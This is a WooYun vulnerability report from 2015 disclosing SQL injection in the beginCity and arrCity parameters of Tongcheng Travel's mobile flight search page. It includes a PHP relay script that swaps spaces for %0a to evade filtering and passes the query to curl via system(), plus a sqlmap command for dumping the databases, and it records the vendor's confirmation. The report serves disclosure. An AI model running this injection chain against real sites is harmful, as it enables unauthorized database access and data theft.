当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117916

漏洞标题:同程旅游网某站绕过waf继续注入

相关厂商:苏州同程旅游网络科技有限公司

漏洞作者: 杀器王子

提交时间:2015-06-03 11:03

修复时间:2015-07-18 11:08

公开时间:2015-07-18 11:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-03: 细节已通知厂商并且等待厂商处理中
2015-06-03: 厂商已经确认,细节仅向厂商公开
2015-06-13: 细节向核心白帽子及相关领域专家公开
2015-06-23: 细节向普通白帽子公开
2015-07-03: 细节向实习白帽子公开
2015-07-18: 细节向公众公开

简要描述:

同程旅游网某站绕过waf继续注入

详细说明:

http://m.ly.com:80/flightnew/?FlyOffTime=2015-06-03&xiaomiUserId=1&beginCity=%E4%B8%8A%E6%B5%B7&arrCity=%E5%8C%97%E4%BA%AC&arrivaltime=1&refid=1
begincity和arrcity都存在注入
然而你司waf进行了过滤
但这并没什么卵用
于是可以轻松绕过出数据
我们看 直接curl这个地址 会301跳转

Snip20150603_5.png


触发waf的语句会跳到404

Snip20150603_6.png

漏洞证明:

下面是我的中专脚本

<?php
$sql = $_GET[sql];
$sql = str_replace(" ", "%0a", $sql);
$sql = str_replace("%20", "%0a", $sql);
$sql = str_replace("+", "%2b", $sql);
$cmd = 'curl "http://m.ly.com:80/flightnew/?FlyOffTime=2015-06-03&xiaomiUserId=1&beginCity=%E4%B8%8A%E6%B5%B7\'%0aand%0a1='.$sql.'--+&arrCity=%E5%8C%97%E4%BA%AC&arrivaltime=1&refid=1"';
system($cmd);
?>


直接用%0a代替空格
于是可以注入了

Snip20150603_7.png


python sqlmap.py --url "http://localhost/ly.php?sql=1" --dbms=mssql --technique=U --union-cols=17 --union-char=121234 --threads=10 --dbs


Snip20150603_8.png

修复方案:

进行更为严格的过滤

版权声明:转载请注明来源 杀器王子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-06-03 11:06

厂商回复:

感谢关注同程旅游,这个站没有waf的。
杀器王子就是屌~

最新状态:

暂无